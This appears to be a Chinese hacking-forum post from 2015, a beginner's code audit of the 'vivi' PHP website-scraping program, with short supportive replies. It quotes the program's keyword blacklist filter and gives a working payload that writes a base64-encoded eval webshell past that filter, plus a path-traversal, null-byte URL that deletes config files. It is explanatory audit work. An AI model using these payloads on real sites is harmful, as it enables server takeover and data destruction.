楼主: 王珂

代码审计小试:vivi万能小偷程序

[复制链接]
  • TA的每日心情
    无聊
    2016-8-19 10:32
  • 签到天数: 80 天

    [LV.6]常住居民II

    发表于 2015-3-18 22:09:02 | 显示全部楼层 |阅读模式
    本帖最后由 王珂 于 2015-3-18 22:13 编辑

    刚开始学代码审计,也算个记载吧
    ===========================
    作者:iceforce
    论坛:www.cnhonker.com
    博客:www.isbug.net
    ===========================

    程序下载地址:http://down.chinaz.com/soft/34668.htm

    在此程序中由于不牵涉到SQL数据库,所以不存在SQL注入的问题,但是存在任意删除,以及直接getshell的问题

    首先是getshell的问题

    程序代码位于:admin/replace.php第46-56行

    [PHP] 纯文本查看 复制代码
    }elseif ($id=='save'){
    $con=get_magic(trim($_POST['keyword']));
    if(@preg_match("/require|include|REQUEST|eval|system|fputs/i", $con)){
    ShowMsg("���зǷ��ַ�,����������",'-1',2000);
    }else{
    write($file,$con);
    ShowMsg("��ϲ��,�޸ijɹ���",'replace.php',2000);
    }
    }
    ?>

    可以看到程序对于提交过来的keyword只过滤的require|include|REQUEST|eval|system|fputs这几个关键词,常见的函数过滤了,但是可以写入一个文件
    登录之后在http://127.0.0.1/code/1/admin/replace.php页面写入

    [PHP] 纯文本查看 复制代码
    <?php fwrite(fopen('./1.php', 'w'),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pg='));?>


    然后访问http://127.0.0.1/code/1/data/keyword.php就会在data目录下生成1.php的小马

    任意删除文件
    漏洞位于admin/caiji_config.php文件里面第10行-16行
    [PHP] 纯文本查看 复制代码
    $id=isset($_GET ['id'])?$_GET ['id']:'';
    $ac=isset($_GET ['ac'])?$_GET ['ac']:'';
    if($ac == 'del') {
    $file=VV_DATA.'/config/'.$id.'.php';
    print($file);
    if(@unlink($file)) ShowMsg("��ϲ��,ɾ���ɹ���",'caiji_config.php',2000);
    }

    可以看到对id并没有进行有效的过滤
    访问

    http://127.0.0.1/code/1/admin/ca ... id=../config.php%00

    即可删除data目录下的config.php文件

    评分

    参与人数 2i币 +14 收起 理由
    契约 + 10
    clocks + 4 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    难过
    2016-8-26 14:36
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    发表于 2015-3-18 23:57:12 | 显示全部楼层
    一样在学审计的路过帮顶
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-3-19 15:11:04 | 显示全部楼层
    支持一下,代码敲得不错
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 08:49:03 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 05:10:39 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-6-30 16:39:04 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 20:00:55 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 20:46:26 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 07:50:50 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-7-3 03:28:02 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 10:28 , Processed in 0.027719 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部